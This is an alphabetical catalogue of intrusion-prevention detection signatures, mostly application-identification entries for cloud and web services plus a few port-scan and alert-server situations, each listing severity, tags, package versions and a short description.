Afas

About this situation: Application Afas detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AFAS develops software products for the corporate and consumer markets. AFAS do this in a socially responsible way in which customers, employees and the environment are central. AFAS automates companies and organizations from all sectors with complete and modern
Back to top

Affiliate-Window

About this situation: Affiliate Window usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Affiliate Window offers advertisers and publishers the best products and services to boost their online business on a performance basis.
Back to top

Affinety-Solutions

About this situation: Application Affinety-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Affinety Solutions is an advanced billing and attendance feature for managing programs such as school age childcare, or other programs where fees are due based on a student's attendance in a program.
Back to top

Affinity-360

About this situation: Application Affinity-360 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Affinity 360 is business platform that allows businesses to select the components they need to build a solution tailored to their particular needs. Available components include CRM, Inventory Management, E-Commerce, Point of Sale and Order Fulfillment.
Back to top

Affinity.com

About this situation: Application Affinity.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Affinity.com - contextual ad network. Offering Next-Gen Media and Monetization Solutions across proprietary Pay-Per-Click and Display Networks.
Back to top

AffinityLive

About this situation: Application AffinityLive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AffinityLive's cloud-based platform includes CRM, project management, email integration, sales, invoicing and time billing.
Back to top

Affytrac

About this situation: Application Affytrac detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Affytrac is a web-based EHandS compliance solution for the life science industry with task management, document corrective actions, etc.
Back to top

Aflac

About this situation: Application Aflac detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aflac Incorporated is provider of supplemental insurance
Back to top

Afreeca

About this situation: Afreeca usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-689-5211
Description: Afreeca relays signals from TV channels and allows users to upload their own videos.
Back to top

AFS-Technologies

About this situation: Application AFS-Technologies detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AFS Technologies provides software and services purpose-built for consumer goods companies efficiencies in trade spend, supply chain and warehouse management.
Back to top

Afsvision

About this situation: Application Afsvision detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Automated Financial Systems
Back to top

AfterSell

About this situation: Application AfterSell detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AfterSell is a web based platform that provides a continuous and closed loop connection with the consumer community for communication in a simple way.
Back to top

AfterShip

About this situation: Application AfterShip detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AfterShip is a shipment tracking application and API for eCommerce retailers and buyers.
Back to top

Aftonbladet

About this situation: Aftonbladet usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-603-5211
Description: Aftonbladet usage detected. Aftonbladet is a Swedish daily newspaper.
Back to top

AgapeWORKS

About this situation: Application AgapeWORKS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AgapeWORKS is an online Church Management Software that allows churches to manage their own environment.
Back to top

Agari

About this situation: Application Agari detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Agari ensures email attacks exploiting your brand will never reach your customers. We provide you with the experience, tools and analytics you need to create a trusted email channel to secure your brand and your revenue.
Back to top

Agency-Analytics

About this situation: Application Agency-Analytics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Agency Analytics - SEO analysis by building SEO tool data directly into reporting interface. Automatically gather SEO metrics like search volume, competitors, backlinks, trust, authority
Back to top

AgencyBloc

About this situation: Application AgencyBloc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AgencyBloc is a web-based agency management system that provides the necessary tools to organize your health or life insurance agency.
Back to top

AgencyMatrix

About this situation: Application AgencyMatrix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Agency Matrix is an agency management software for insurance agents. Features of Agency Matrix include Virtual Employee, website design, telephony software and more.
Back to top

AgencyOrganizer

About this situation: Application AgencyOrganizer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AgencyOrganizer captures leads, stores them in a database, then accurately tracks them.
Back to top

Agendize-Online-Scheduling

About this situation: Application Agendize-Online-Scheduling detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Agendize Online Scheduling is the way to manage your appointment scheduling on the web with automatic reminders reduce no-shows. The integrated CRM tool automatically collects valuable customer data such as name, number, email and more. Your sales teams will gain a full picture of your client's online context and relationship with your business.
Back to top

Agent-Achieve

About this situation: Application Agent-Achieve detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AgentAchieve from CoreLogic is an all-in-one real estate broker business management and agent productivity software solution that offers integrated websites, lead management, CRM and e-marketing and other tools that keep customers and agents connected
Back to top

Agentis-Platform

About this situation: Application Agentis-Platform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Agentis supplies electric utilities energy-efficiency and energy-management software applications for their business customers.
Back to top

AgentMethods

About this situation: Application AgentMethods detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AgentMethods is a website platform for independent insurance agents that empowers insurance agents to launch and manage a professional web presence in minutes without any programming or technical knowledge.
Back to top

Aggregatur

About this situation: Application Aggregatur detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aggregatur lets you bill and collect payments from the leads you sold automatically.
Back to top

Aggressive_ICMP_Scan_Started

About this situation: Aggressive ICMP scan start detected
Context: Scan Started Event
Severity: 7
Tags: Inspection
First detected in: sgpkg-ips-79-1314
Last changed: sgpkg-ips-371-4219
Description: Aggressive ICMP scanning activity detected. A host is aggressively scanning the network. This may indicate worm/bot activity or the use of a vulnerability scanner. Connection attempts from this originating host have matched the port scanning detection paramaters. Tracking of this port/host scanning activity is started and will be reported in subsequent related events. Risk analysis: Risk level is high. Port scanning can be used as part of the information gathering process and it often precedes an actual attack. Most relevant log fields: "Attacker IP" shows the originating IP address of the port scan. The counters and limit fields show the detection thresholds that were exceeded. "IP source" , "Source port" , "Destination port" , and "IP destination" show the source and destination addresses of the latest datagram related to this scan.
Back to top

Aggressive_TCP_Scan_Started

About this situation: Aggressive TCP scan start detected
Context: Scan Started Event
Severity: 7
Tags: Inspection
First detected in: sgpkg-ips-79-1314
Last changed: sgpkg-ips-371-4219
Description: Aggressive TCP scanning activity detected. A host is aggressively scanning the network. This may indicate worm/bot activity or the use of a vulnerability scanner. Connection attempts from this originating host have matched the port scanning detection paramaters. Tracking of this port/host scanning activity is started and will be reported in subsequent related events. Risk analysis: Risk level is high. Port scanning can be used as part of the information gathering process and it often precedes an actual attack. Most relevant log fields: "Attacker IP" shows the originating IP address of the port scan. The counters and limit fields show the detection thresholds that were exceeded. "IP source" , "Source port" , "Destination port" , and "IP destination" show the source and destination addresses of the latest datagram related to this scan.
Back to top

Aggressive_UDP_Scan_Started

About this situation: Aggressive UDP scan start detected
Context: Scan Started Event
Severity: 7
Tags: Inspection
First detected in: sgpkg-ips-79-1314
Last changed: sgpkg-ips-371-4219
Description: Aggressive UDP scanning activity detected. A host is aggressively scanning the network. This may indicate worm/bot activity or the use of a vulnerability scanner. Connection attempts from this originating host have matched the port scanning detection paramaters. Tracking of this port/host scanning activity is started and will be reported in subsequent related events. Risk analysis: Risk level is high. Port scanning can be used as part of the information gathering process and it often precedes an actual attack. Most relevant log fields: "Attacker IP" shows the originating IP address of the port scan. The counters and limit fields show the detection thresholds that were exceeded. "IP source" , "Source port" , "Destination port" , and "IP destination" show the source and destination addresses of the latest datagram related to this scan.
Back to top

Agile-ft

About this situation: Application Agile-ft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Agile Financial Technologies is a enterprise software products and services provider, focused on the Banking, Financial Services and Insurance sectors.
Back to top

Agilebench

About this situation: AgileBench usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Agile Bench contains everything you need to plan and track your agile projects. You can categorize and find stories in your backlog, view work as cards on a wall, review velocity and chart your burndown.
Back to top

AgileCRM

About this situation: Application AgileCRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AgileCRM is a sales and marketing CRM for businesses.
Back to top

Agilewords

About this situation: AgileWords usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: AgileWords provides a central place to comment, review, edit, track changes, and approve a document. Accessible anytime. Agilewords displays comments and edits in a panel alongside the document. AgileWords supports all MS Word file formats, whether you work on a Mac or PC.
Back to top

Agilezen

About this situation: AgileZen usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: AgileZen is a simple, flexible, and cost-effective web-based software for project management built on ideas from agile, lean, and kanban methodologies.
Back to top

Agility-CMS

About this situation: Application Agility-CMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Agility is a cloud content management system (CMS) that provides media companies and brands with the tools to create world-class digital experiences across web, mobile and social media.
Back to top

AgilityBMS

About this situation: Application AgilityBMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AgilityBMS is a Business Management Software that simplifies, centralises, and manages your processes, documents, risks and compliance obligations.
Back to top

Agiloft

About this situation: Agiloft usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: This software includes pre-built and custom enterprise applications that users can configure to automate and improve the efficiency of their business processes.
Back to top

Agorapulse

About this situation: Application Agorapulse detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AgoraPulse is a Facebook Marketing and CRM suite that helps Facebook Page owners and marketers to manage their page, gain more fans, Facebook traffic and qualified opt-in leads.
Back to top

Agree'nSign

About this situation: Application Agree'nSign detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Agree'nSign - an electronic signature tool allowing online execution of contracts without pen, paper or fax.
Back to top

AgreeAdate

About this situation: Application AgreeAdate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: agreeAdate is online tool for planning meetings and scheduling events. Choose dates and send email invitations
Back to top

AgreeDo

About this situation: Application AgreeDo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AgreeDo helps you to get more out of your meetings - by allowing you create agendas, capture meeting minutes and to track the results.
Back to top

Agreement-Express

About this situation: Application Agreement-Express detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Agreement Express is a contract management software platform that enables organizations to completely automate or dramatically accelerate documents through every bottleneck in your process, enabling you to improve productivity and operating margins within days of activation.
Back to top

Agriya

About this situation: Application Agriya detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Agriya provides consulting and IT Services to clients in market. It specialized in web application development such as PHP project development, PHP website development, and e-commerce web development.
Back to top

AheevaCCS

About this situation: Application AheevaCCS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aheeva develops and distributes software and management solutions for call centerson IP based technology.
Back to top

AHM placeholder

About this situation: AHM placeholder
Context: AHH_SIDMAP
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1571-5242
Last changed: sgpkg-ips-1571-5242
Description: Internal AHM situation
Back to top

Ahmia

About this situation: Ahmia usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Description: Ahmia is a search engine for hidden onion sites running inside Tor network.
Back to top

Ahrefs

About this situation: Ahrefs usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Default string about the company, need to be changed.
Back to top

Ahsay

About this situation: Application Ahsay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ahsay provides a backup software available for backup data on-premises or offsite.
Back to top

AI and ML Applications

About this situation: Sites that provide tools or services related to artificial intelligence and machine learning. Includes sites hosting applications with personal productivity or business purposes using AI.
Context: URL Application Context
Severity: 1
Tags: Miscellaneous
First detected in: sgpkg-ips-1649-5242
Last changed: sgpkg-ips-1649-5242
Description: Sites that provide tools or services related to artificial intelligence and machine learning. Includes sites hosting applications with personal productivity or business purposes using AI.
Back to top

AIM-Computer-Solutions-Inc.

About this situation: Application AIM-Computer-Solutions-Inc. detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AIM Vision for Supply Chain Management, EDI and Bar Code Labeling, Release and Demand Management, and Plant Floor Mobile Apps.
Back to top

AIM-Web-Settings

About this situation: Application AIM-Web-Settings detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AOL Instant Messenger
Back to top

AIMS-360

About this situation: Application AIMS-360 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AIMS 360 is the Apparel ERP Software in your office or on the Cloud.
Back to top

AIMsi

About this situation: Application AIMsi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AIMsi offers retailers fully integrated add-on modules such as Accounts Payable and General Ledger, Purchase Orders, Repair and Service, Lesson or Appointment Scheduling and Billing, Short Term Rentals, Rent and Sales Contracts, Contact Management and Emailing capabilities.
Back to top

Air-Canada

About this situation: Air Canada usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Air Canada is the flag carrier and largest airline of Canada.
Back to top

AirAIM

About this situation: AirAIM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-445-4219
Last changed: sgpkg-ips-630-5211
Description: AirAIM (www.airaim.com) provides a web-based AIM/ICQ client-side user interface. Users can logon with AIM/ICQ account and exchange instant messages with their contacts. Note that the AirAIM is not an official interface to AIM/ICQ.
Back to top

Airbrake

About this situation: Airbrake usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Airbrake Bug Tracker captures errors and aggregate the results for developer review.
Back to top

Aircall

About this situation: Application Aircall detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aircall is a cloud-based phone system and call center software solution that integrates with your favorite CRM and Helpdesk.
Back to top

Aircraft-Maintenance-Systems

About this situation: Application Aircraft-Maintenance-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aircraft Maintenance Systems is a software company committed to designing practical software tools to plan, manage and track aircraft maintenance operations and to track parts and components inventory from cradle-to-grave.
Back to top

AircraftLogs

About this situation: Application AircraftLogs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AircraftLogs provides web-based aviation data management systems for corporate and private business aircraft.
Back to top

AirData-Cloud

About this situation: Application AirData-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AirData Cloud - cloud storage service provided by AirData
Back to top

Airdroid

About this situation: AirDroid usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: AirDroid can wirelessly manage, control and access to Android Devices from a web browser. AirDroid allows user to access and manage Android phone or tablet from Windows, Mac or the Web, wirelessly, for free. Transfer files between devices, and share files to friends.
Back to top

AirDropper

About this situation: Application AirDropper detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AirDropper is a fully-featured file sharing service that integrates with Dropbox.
Back to top

AireContact

About this situation: Application AireContact detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AireContact provides a Cloud Hosted Contact Center Software for inbound and outbound call centers.
Back to top

AirPlay

About this situation: AirPlay usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media
First detected in: sgpkg-ips-1744-5242
Last changed: sgpkg-ips-1814-5242
Description: AirPlay is a wireless streaming technology by Apple. It provides the possibility to share videos, music, and other media between devices. Note that allowing this application in an access rule will also allow RTP-Dynamic and iTunes applications.
Back to top

AirPlus

About this situation: Application AirPlus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AirPlus International is a key provider of savings to customers through a suite of business travel payment solutions which include central bill accounts, corporate cards and online management tools.
Back to top

Airpush

About this situation: Airpush usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Airpush is one of the largest mobile ad platforms with over 120,000 live apps utilizing its SDK.
Back to top

Airtable

About this situation: Application Airtable detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Airtable works like a spreadsheet but gives you the power of a database to organize anything.
Back to top

Airtel-Business

About this situation: Application Airtel-Business detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Airtel Business offers voice, data, network integration, data center and managed services, enterprise mobile applications and digital media..
Back to top

AirWatch

About this situation: Application AirWatch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VMware AirWatch is a provider of enterprise mobility management
Back to top

Aisc

About this situation: Application Aisc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Artemis International provide managing the Largest Projects and Portfolios in the World Where Time and Cost Management are of Central Importance.
Back to top

Akamai

About this situation: Akamai usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1373-5242
Description: Akamai content delivery network usage has been detected.
Back to top

Akamai NetSession Client

About this situation: Endpoint Context Agent based Akamai NetSession Client
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-991-5242
Last changed: sgpkg-ips-991-5242
Description: Akamai NetSession endpoint application has been detected. Akamai NetSession Client is a helper application that is used to download and stream content from Akamai's server infrastructure.
Back to top

Akamai-Analytics

About this situation: Akamai Analytics usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-916-5242
Last changed: sgpkg-ips-1128-5242
Description: Akamai Analytics is a statistics collection and analysis service.
Back to top

Akamai-Edgesuite

About this situation: Akamai Edgesuite usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-1128-5242
Description: Akamai Edgesuite content delivery network usage has been detected.
Back to top

Akamai-HD

About this situation: Akamai HD usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1563-5242
Description: Akamai HD video streaming service usage has been detected.
Back to top

Akamai-Infrastructure

About this situation: Akamai Servers usage
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-816-5242
Last changed: sgpkg-ips-1873-5242
Description: This application signature tracks the host ip addresses referring to Akamai servers and caches worldwide.
Back to top

Akamai-NetSession-Interface

About this situation: Akamai NetSession Interface usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-1128-5242
Description: Akamai NetSession Interface is a content delivery service.
Back to top

Akismet

About this situation: Application Akismet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Akismet is a hosted web service that saves you time by automatically detecting comment and trackback spam.
Back to top

AkkenCloud

About this situation: Application AkkenCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AkkenCloud is a staffing and recruiting software is on a record pace, with continuous innovations, enhanced features, and an increasing customer community.
Back to top

Akquinet

About this situation: Application Akquinet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Objective of akquinet is to optimize business processes through the use and integration of standard and customized software. Akquinet AG is an international IT consulting company headquartered in Hamburg and employs 450 professionals with extensive knowledge in future-oriented technologies.
Back to top

Akritiv

About this situation: Application Akritiv detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Akritiv is Software as a Service solution for Enterprise Services, that combine developed based and executed on advanced computing platforms that combine cloud computing, internet-native designs, and an adaptive deployment approach.
Back to top

AKSAAS

About this situation: Application AKSAAS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AKSAAS provides solutions to transform the cloud and SaaS landscape.
Back to top

Aktia

About this situation: Aktia usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1764-5242
Description: Aktia usage detected. Aktia is a Finnish bank.
Back to top

Alacra

About this situation: Application Alacra detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Alacra organizes financial and legal information to aid financial professionals in conducting mandated regulatory searches.
Back to top

Alaska-Airlines

About this situation: Alaska Airlines usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Alaska Airlines services to more than 100 destinations in the contiguous United States, Canada, Mexico, and four Hawaiian Islands.
Back to top

Alawar-Entertainment

About this situation: Alawar Entertainment usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Albridge

About this situation: Application Albridge detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Albridge provides enterprise wealth management services that deliver an accurate, single view of all of their clients assets. Albridge consolidates client account data from hundreds of disparate sources - proprietary, banking, brokerage, insurance, retirement, alternatives, trusts, etc.
Back to top

Album-Exposure

About this situation: Application Album-Exposure detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Present your albums, collect feedback, save time and improve your client experience by proofing your albums online with AlbumExposure
Back to top

Alchemy

About this situation: Application Alchemy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Alchemy Communications - premiere provider of colocation and data center managed services
Back to top

Alcohol and Tobacco

About this situation: Sites that provide information about, promote or support the sale of alcoholic beverages or tobacco products or associated paraphernalia.
Context: URL Application Context
Severity: 1
Tags: Society and Lifestyles, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about, promote or support the sale of alcoholic beverages or tobacco products or associated paraphernalia.
Back to top

ALD

About this situation: Application ALD detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ALD is the consulting firm and software provider in the field of reliability engineering and analysis, safety analysis and safety management, quality engineering and quality assurance.
Back to top

Alert Server: Active alert queue becoming full

About this situation: Alert Server: Active alert queue becoming full
Context: Alert Server situations
Severity: 8
Tags: SMC
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-529-5211
Description: New non-critical alerts will be auto-acknowledged. If the active alert queue becomes full, all new alerts will be auto-acknowledged. Read and acknowledge the active alerts.
Back to top

Alert Server: Active alert queue full

About this situation: Alert Server: Active alert queue full
Context: Alert Server situations
Severity: 10
Tags: SMC
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-529-5211
Description: New alerts will be auto-acknowledged. Read and acknowledge the active alerts.
Back to top

Alert Server: Failed to send an alert notification

About this situation: Alert Server: Failed to send an alert notification
Context: Alert Server situations
Severity: 10
Tags: SMC
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
